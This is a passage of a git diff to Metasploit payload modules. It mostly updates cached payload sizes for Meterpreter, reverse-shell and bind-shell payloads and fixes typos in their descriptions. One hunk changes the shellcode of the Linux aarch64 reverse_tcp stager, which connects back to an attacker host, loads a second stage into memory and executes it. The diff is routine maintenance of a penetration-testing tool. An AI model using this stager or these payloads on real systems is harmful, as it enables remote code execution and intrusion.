'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668360 + CachedSize = 668392 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index a6892795d8..d1e889a621 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668360 + CachedSize = 668392 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index b462a421f5..7ac0601213 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668360 + CachedSize = 668392 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index c5a23244d4..5da3516adf 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666552 + CachedSize = 666984 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 7cec5d5b2d..976d22b3d0 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666552 + CachedSize = 666984 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 32f1797ad9..866d3a0e5c 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666552 + CachedSize = 666984 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 12bd32a0c2..8e5a81046a 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059224 + CachedSize = 1059368 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index d7241022d6..01618c62b5 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059224 + CachedSize = 1059368 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 9dcfa4638b..65778b0f92 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059224 + CachedSize = 1059368 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 6573c7cd50..ee78530672 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1036772 + CachedSize = 1037512 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bfb5b65889..05b53aa7ba 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1036772 + CachedSize = 1037512 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 4fb6aeb351..bc38d4a374 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1036772 + CachedSize = 1037512 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index b92931cb30..92ad4f9c77 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036084 + CachedSize = 1036808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 4184fbfa70..27e5989778 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036084 + CachedSize = 1036808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 9c584d2c3c..66cdd82b24 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036084 + CachedSize = 1036808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index d4b81c414d..7c3d17f612 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789164 + CachedSize = 789196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index a1529ea88a..2edd9d4421 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789164 + CachedSize = 789196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index eb12d092a3..fe8cbdd08a 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789164 + CachedSize = 789196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index b1d45984e3..94dbd28258 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855864 + CachedSize = 855928 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index a57d7853f1..353b7ccf37 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855864 + CachedSize = 855928 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 7b941b6fc2..48c3abe40b 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855864 + CachedSize = 855928 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 8343c7a2db..c8ec4d34ba 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 725024 + CachedSize = 729184 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index b70a9dd9b0..3e9f8ab1d6 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 725024 + CachedSize = 729184 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index faf3b67665..e52a985f0c 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 725024 + CachedSize = 729184 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3337240fae..3d44d1abe8 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772796 + CachedSize = 772828 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 3443d7e158..8d2f70e310 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772796 + CachedSize = 772828 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index f50af31339..55bdf50aa5 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772796 + CachedSize = 772828 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index e2e5f05cf4..d5adac9574 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 2d3a76a76a..0e8fe66ace 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index c5c8c806f1..abb089db49 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 2c6e7eea3a..4ed9636e28 100644 --- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline', 'Description' => 'Listen for a connection and spawn a command shell. - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/nodejs/shell_bind_tcp.rb b/modules/payloads/singles/nodejs/shell_bind_tcp.rb index 2e1d32ee2f..9791edb88f 100644 --- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 456 + CachedSize = 583 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index bacd994122..dda23c29a5 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 488 + CachedSize = 601 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 02652008b6..aae3bf8947 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 629 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 22d2d4f103..4a08503586 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index ad23394040..6436a8b549 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index f46fc103e9..a70eb46ee7 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb index 532b2dbe8a..c8bda82d1e 100644 --- a/modules/payloads/singles/r/shell_bind_tcp.rb +++ b/modules/payloads/singles/r/shell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 125 include Msf::Payload::Single include Msf::Payload::R diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb index 1d85c1b5ed..3f2137b330 100644 --- a/modules/payloads/singles/r/shell_reverse_tcp.rb +++ b/modules/payloads/singles/r/shell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 150 include Msf::Payload::Single include Msf::Payload::R diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 990c2fcbd4..4aa49bfccd 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 6f4ff6b4a3..12cb6341e7 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 172627 + CachedSize = 180311 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 497c51c67e..539bfd288f 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 172627 + CachedSize = 180311 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 1be8bad8e2..23d9de6df9 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 9f5f06ae24..256f5b6225 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e8876c1069..de8c4d1e0e 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -20,7 +20,7 @@ module MetasploitModule 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not - comming from the IP defined in AHOST. This way the port will appear + coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.', 'Author' => [ diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index fe5574659a..058078b353 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 22871e6313..0398f24b52 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 195667 + CachedSize = 206423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 84ce0fd385..5679a3a8be 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 195667 + CachedSize = 206423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index f976180dfe..bb151559da 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index dbe4e38232..337ebe2c73 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 3fda8961b3..eb6ad11d09 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp' ### module MetasploitModule - CachedSize = 260 + CachedSize = 212 include Msf::Payload::Stager @@ -33,8 +33,8 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 186, 'n' ], - 'LHOST' => [ 188, 'ADDR' ], + 'LPORT' => [ 206, 'n' ], + 'LHOST' => [ 208, 'ADDR' ], }, 'Payload' => [ @@ -45,19 +45,20 @@ module MetasploitModule 0xd28018c8, # mov x8, #0xc6 // #198 0xd4000001, # svc #0x0 0xaa0003ec, # mov x12, x0 - 0x10000501, # adr x1, b8 + 0x100005a1, # adr x1, cc 0xd2800202, # mov x2, #0x10 // #16 0xd2801968, # mov x8, #0xcb // #203 0xd4000001, # svc #0x0 - 0x35000420, # cbnz w0, ac + 0x350004c0, # cbnz w0, c0 0xaa0c03e0, # mov x0, x12 0xd10043ff, # sub sp, sp, #0x10 0x910003e1, # mov x1, sp 0xd2800082, # mov x2, #0x4 // #4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000340, # cbz w0, ac - 0xf94003e2, # ldr x2, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x540003c0, # b.eq c0 + 0xb94003e2, # ldr w2, [sp] 0xd34cfc42, # lsr x2, x2, #12 0x91000442, # add x2, x2, #0x1 0xd374cc42, # lsl x2, x2, #12 @@ -69,7 +70,9 @@ module MetasploitModule 0xaa1f03e5, # mov x5, xzr 0xd2801bc8, # mov x8, #0xde // #222 0xd4000001, # svc #0x0 - 0xf94003e4, # ldr x4, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x54000200, # b.eq c0 + 0xb94003e4, # ldr w4, [sp] 0xf90003e0, # str x0, [sp] 0xaa0003e3, # mov x3, x0 0xaa0c03e0, # mov x0, x12 @@ -77,11 +80,13 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x540000c0, # b.eq c0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 - 0x54ffff21, # b.ne 84 - 0xf94003fe, # ldr x30, [sp] - 0xd65f03c0, # ret + 0x54fffee1, # b.ne 90 + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index 7afd06288c..048eff527c 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1188 + CachedSize = 1338 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 1c37e02e3a..ad9c422279 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1187 + CachedSize = 1337 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index 38f7db54b4..89f2f2ae3b 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1361 + CachedSize = 1511 